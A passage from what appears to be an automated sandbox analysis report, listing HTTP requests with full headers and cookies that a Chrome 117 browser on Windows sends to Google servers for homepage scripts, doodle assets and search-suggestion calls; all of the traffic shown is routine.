image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
Source: global traffic	HTTP traffic detected: GET /logos/doodles/2024/popcorn/rc4/popcorn.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
Source: global traffic	HTTP traffic detected: GET /logos/2024/popcorn/rc4/cta.png HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
Source: global traffic	HTTP traffic detected: GET /images/searchbox/desktop_searchbox_sprites318_hr.webp HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=1/ed=1/dg=3/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/ee=ALeJib:B8gLwd;AfeaP:TkrAjf;BMxAGc:E5bFse;BgS6mb:fidj5d;BjwMce:cXX2Wb;CxXAWb:YyRLvc;DULqB:RKfG5c;Dkk6ge:JZmW9e;DpcR3d:zL72xf;EABSZ:MXZt9d;ESrPQc:mNTJvc;EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;EnlcNd:WeHg4;F9mqte:UoRcbe;Fmv9Nc:O1Tzwc;G0KhTb:LIaoZ;G6wU6e:hezEbd;GleZL:J1A7Od;HMDDWe:G8QUdb;HoYVKb:PkDN7e;HqeXPd:cmbnH;IBADCc:RYquRb;IoGlCf:b5lhvb;IsdWVc:qzxzOb;JXS8fb:Qj0suc;JbMT3:M25sS;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;KOxcK:OZqGte;KQzWid:ZMKkN;KcokUb:KiuZBf;KpRAue:Tia57b;LBgRLc:SdcwHb,XVMNvd;LEikZe:byfTOb,lsjVmc;LXA8b:q7OdKd;LsNahb:ucGLNb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Np8Qkd:Dpx6qc;Nyt6ic:jn2sGd;OgagBe:cNTe0;OohIYe:mpEAQb;Pjplud:EEDORb,PoEs9b;Q1Ow7b:x5CSu;Q6C5kf:pfdZCe;QGR0gd:Mlhmy;R2kc8b:ALJqWb;R4IIIb:QWfeKf;R9Ulx:CR7Ufe;RDNBlf:zPRCJb;SLtqO:Kh1xYe;SMDL4c:fTfGO,fTfGO;SNUn3:ZwDk9d,x8cHvb;ScI3Yc:e7Hzgb,e7Hzgb;ShpF6e:N0pvGc;SzQQ3e:dNhofb;TxfV6d:YORN0b;U96pRd:FsR04;UBKJZ:LGDJGb;UDrY1c:eps46d;UVmjEd:EesRsb;UyG7Kb:wQd0G;V2HTTe:RolTY;VGRfx:VFqbr;VN6jIc:ddQyuf;VOcgDe:YquhTb;VsAqSb:PGf2Re;VxQ32b:k0XsBb;WCEKNd:I46Hvd;WDGyFe:jcVOxd;Wfmdue:g3MJlb;XUezZ:sa7lqb;YIZmRd:A1yn5d;YV5bee:IvPZ6d;YkQtAf:rx8ur;ZMvdv:PHFPjb;ZSH6tc:QAvyLe;ZWEUA:afR4Cf;a56pNe:JEfCwb;aAJE9c:WHW6Ef;aCJ9tf:qKftvc;aZ61od:arTwJ;af0EJf:ghinId;bDXwRe:UsyOtc;bcPXSc:gSZLJb;cEt90b:ws9Tlc;cFTWae:gT8qnd;coJ8e:KvoW8;dIoSBb:ZgGg9b;dLlj2:Qqt3Gf;daB6be:lMxGPd;dowIGb:ebZ3mb,ebZ3mb;dtl0hd:lLQWFe;eBAeSb:Ck63tb;eBZ5Nd:audvde;eHDfl:ofjVkb;eO3lse:nFClrf;euOXY:OZjbQ;g8nkx:U4MzKc;gaub4:TN6bMe;gtVSi:ekUOYd;h3MYod:cEt90b;hK67qb:QWEO5b;heHB1:sFczq;hjRo6e:F62sG;hsLsYc:Vl118;iFQyKf:QIhFr,vfuNJf;imqimf:jKGL2e;jY0zg:Q6tNgc;k2Qxcb:XY51pe;kCQyJ:ueyPK;kMFpHd:OTA3Ae;kbAm9d:MkHyGd;lOO0Vd:OTA3Ae;lkq0A:JyBE3e;nAFL3:NTMZac,s39S4;nJw4Gd:dPFZH;oGtAuc:sOXFj;oSUNyd:fTfGO,fTfGO;oUlnpc:RagDlc;okUaUd:wItadb;pKJiXd:VCenhc;pNsl2d:j9Yuyc;pXdRYb:JKoKVe;pj82le:mg5CW;qZx2Fc:j0xrE;qaS3gd:yiLg6e;qafBPd:sgY6Zb;qavrXe:zQzcXe;qddgKe:d7YSfd,x4FYXe;rQSrae:C6D5Fc;sTsDMc:kHVSUb;sZmdvc:rdGEfc;tH4IIe:Ymry6;tosKvd:ZCqP3;trZL0b:qY8PFe;uuQkY:u2V3ud;vGrMZ:lPJJ0c;vfVwPd:lcrkwe;w3bZCb:ZPGaIb;w4rSdf:XKiZ9;w9w86d:dt4g2b;wQlYve:aLUfP;wR5FRb:O1Gjze,TtcOte;wV5Pjc:L8KGxe;whEZac:F4AmNb;xBbsrc:NEW1Qc;ysNiMc:CpIBjd;yxTchf:KUM7Z;z97YGf:oug9te;zOsCQe:Ko78Df;zaIgPb:Qtpxbd/m=cdos,hsm,jsa,mb4ZUb,d,csi,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: empty
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SpvAvsXfWWo.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-MoqWi0fF1M09Ccs-6QfulXvxfdg/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
Source: global traffic	HTTP traffic detected: GET /widget/callout?prid=19037050&pgid=19037049&puid=9ceb59a7585b55bd&eom=1&cce=1&dc=1&origin=https%3A%2F%2Fwww.google.com&cn=callout&pid=1&spid=538&hl=en HTTP/1.1Host: ogs.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
Source: global traffic	HTTP traffic detected: GET /complete/search?q&cp=0&client=gws-wiz&xssi=t&gs_pcrt=2&hl=en&authuser=0&psi=64P1ZseiHfKwi-gPg-6IsAw.1727366125395&dpr=1&nolsbt=1 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/md=2/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
Source: global traffic	HTTP traffic detected: GET /logos/2024/popcorn/rc4/messages.en.nocache.json HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
Source: global traffic	HTTP traffic detected: GET /logos/doodles/2024/popcorn/rc4/popcorn.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
Source: global traffic	HTTP traffic detected: GET /images/hpp/ic_wahlberg_product_core_48.png8.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ogs.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/ck=xjs.hd.3K9kqFG9IbE.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAEAUoDsJAABGAQAbABAAAAAAAAIAgAEAAYIAACIBAAABAnABABAIAIACABEJAICgCcCjTIBACBAmgAAKIAQoQAIEiiAUIgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACACCAYwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAQAEggAANgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/ujg=1/rs=ACT90oFp4gBNGXk7N4F5TdcKKkHmQCd2hQ/m=sb_wiz,aa,abd,syu0,sytz,sytu,syfw,syty,sytk,sy10v,sy103,sytp,sy102,syup,sytv,sytx,sytt,syue,syti,syuf,syug,syu7,syub,sytq,syu5,syu8,syu9,syu2,syu3,sytl,sytm,syrv,syrk,syri,syrh,syto,sy101,syuo,syun,syum,async,sywj,ifl,pHXghd,sf,sys2,sys5,sy48m,sonic,TxCJfd,sy48q,qzxzOb,IsdWVc,sy48s,sy1fe,sy1bs,sy1bo,syrg,syre,syrf,syrd,syrc,sy47c,sy47f,sy2c0,sy17n,sy14e,sy14f,syrq,syr8,syfa,sybu,sybx,sybs,sybw,sybv,syco,spch,sysv,sysu,rtH1bd,sy1cx,sy18q,sy17f,syg8,sy1cw,sy14k,sy1cv,sy17g,syga,sy1cy,SMquOb,sy8f,sygh,syge,sygf,sygi,sygd,sygq,sygo,sygm,sygc,sycl,sycg,sycj,syaj,syab,syb5,syai,syah,syag,sya4,syb0,syap,sy9r,sy9q,sych,sybz,syc0,syc6,syan,syb8,syc5,syby,sybr,sybq,syae,syal,syc1,sybm,sybj,sybi,sybk,syad,syb6,sybd,sybb,sybf,sybc,sybe,sya8,syb3,sycq,syd5,sycr,syd6,sya6,syb2,sya9,syb4,sya5,syb1,syao,syaa,sycp,syce,syca,sycb,sy9u,sy9y,sy9v,sy9z,sy9w,sy9o,sy9l,sy9n,sya3,syc2,syg2,sygb,syg7,syg5,sy7y,sy7v,sy7x,syg4,syg9,syg3,syg1,syfy,syfx,sy81,uxMpU,syft,syd0,sycy,sycs,syd7,sycu,syct,sybg,sycw,sycn,sy8x,sy8w,sy8v,Mlhmy,QGR0gd,aurFic,sy96,fKUV3e,OTA3Ae,sy8g,OmgaI,EEDORb,PoEs9b,Pjplud,sy8r,sy8k,A1yn5d,YIZmRd,uY49fb,sy7s,sy7q,sy7r,sy7p,sy7o,byfTOb,lsjVmc,LEikZe,kWgXee,Ug7Xab,U0aPgd,ovKuLd,sgY6Zb,qafBPd,ebZ3mb,dowIGb,sy1d2,sy1cz,syzi,syt6,d5EhJe,sy1di,fCxEDd,sywo,sy1dh,sy1dg,sy1df,sy1db,sy1d6,sy1d8,sy1d7,sy1da,sy1am,sy1af,sy17w,sywn,syz4,syz3,T1HOxc,sy1d9,sy1d5,zx30Y,sy1dj,sy1dd,sy192,Wo3n8,syv0,loL8vb,syv4,syv3,syv2,ms4mZb,syq8,B2qlPe,syw2,NzU6V,sy117,sywi,zGLm3b,syxw,syxx,syxo,DhPYme,MpJwZc,UUJqVe,sy7l,sOXFj,sy7k,s39S4,oGtAuc,NTMZac,nAFL3,sy8d,sy8c,q0xTif,y05UD,sy14x,sy1ce,sy1c8,syz2,sy1c0,sy16f,syz1,syz0,syyz,syz5,sy1c7,sy167,sy1bw,sy16c,sy1c6,sy14s,sy1c1,sy1bx,sy16d,sy16e,sy1c9,sy14h,sy1c5,sy1c4,sy1c2,syno,sy1c3,sy1cb,sy1bq,sy1by,sy1bp,sy1bv,sy1br,sy17a,sy1bz,sy1bl,sy16h,sy16i,syz7,syz8,epYOx?xjs=s3 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCN
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/md=2/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
